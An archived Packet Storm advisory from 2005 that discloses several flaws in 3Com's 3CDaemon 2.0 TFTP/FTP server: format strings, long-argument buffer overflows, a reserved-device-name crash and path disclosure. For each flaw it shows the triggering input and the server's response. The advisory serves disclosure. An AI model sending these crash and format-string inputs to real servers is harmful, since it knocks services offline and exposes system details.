Exploit the possiblities


Posted Jan 5, 2005
Authored by Sowhat | Site secway.org

3Com's 3CDaemon 2.0 revision 10 is susceptible to multiple vulnerabilities ranging from various format string and denial of service flaws.

tags | exploit, denial of service, vulnerability
MD5 | 70f67f8c67fad4e6be72a2ea54c68c6f


Change Mirror Download
3Com 3CDaemon Multiple Vulnerabilities 

By Sowhat

[I.T.S] Security Research Team

Product Affected:

3Com 3CDaemon 2.0 revision 10




3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows

platforms, developed by dan_gill@3Com.

For more information,

3CDaemon is full of holes,ISS and Wang Ning <nwang@scn.com.cn> has already

reported some bugz about 3CDaemon
(see: http://xforce.iss.net/xforce/xfdb/8970

And I doucument some other well-known bugz here again :)

(2) Details

Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows

to execute arbitrary command as the user running 3CDaemon (usually

Administrator).Some of these Vulnerabilities didnt need a valid username and

password to login.

There are several vulnerabilies

1.TFTP Reserved Device Name Denial of Service

D:\WINDOWS\system32>tftp -i get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".

2.FTP Username Format String vulnerability

Connected to
220 3Com 3CDaemon FTP Server Version 2.0
User ( %n
Connection closed by remote host.

Connected to
220 3Com 3CDaemon FTP Server Version 2.0
User ( %s
331 User name ok, need password
530 Login access denied
Login failed.

And then the 3CDaemon is dead.

3.FTP long Username Buffer overflow

Connected to
220 3Com 3CDaemon FTP Server Version 2.0
User (
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.

4.Multiple FTP command long parameter Buffer overflow
Including:cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD, and so on
(Maybe this is what ISS's Advisory talking about)

ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.

ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.

ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.

It seems that the length of the "A" is different from every command.

5.Multiple FTP command Format string
Including:cd,delete,rename,rmdir,literal,stat,CWD, and so on

230 User logged in
ftp> cd %n
Connection closed by remote host.

6.Multiple FTP command Reserved Device Name Information Leak
Including cd,and so on

The following command will disclosure the physical path of the 3cdaemon

ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

and also ,CD an exsiting filename will disclosure physical path too.

ftp> cd toolz.rar
550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!

There are still some other boring bugz ,but it's enough : >


Workaroud ? No......

(4) Vendor Response

Since it seems that 3com didnt maintained 3CDaemon for a long long time ,I dint
contact them :)

Thank to all the members of ITS Security Team


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?

Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

March 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    14 Files
  • 2
    Mar 2nd
    12 Files
  • 3
    Mar 3rd
    1 Files
  • 4
    Mar 4th
    3 Files
  • 5
    Mar 5th
    15 Files
  • 6
    Mar 6th
    23 Files
  • 7
    Mar 7th
    15 Files
  • 8
    Mar 8th
    15 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    2 Files
  • 11
    Mar 11th
    1 Files
  • 12
    Mar 12th
    16 Files
  • 13
    Mar 13th
    20 Files
  • 14
    Mar 14th
    14 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    15 Files
  • 17
    Mar 17th
    5 Files
  • 18
    Mar 18th
    2 Files
  • 19
    Mar 19th
    8 Files
  • 20
    Mar 20th
    7 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2018 Packet Storm. All rights reserved.

Security Services
Hosting By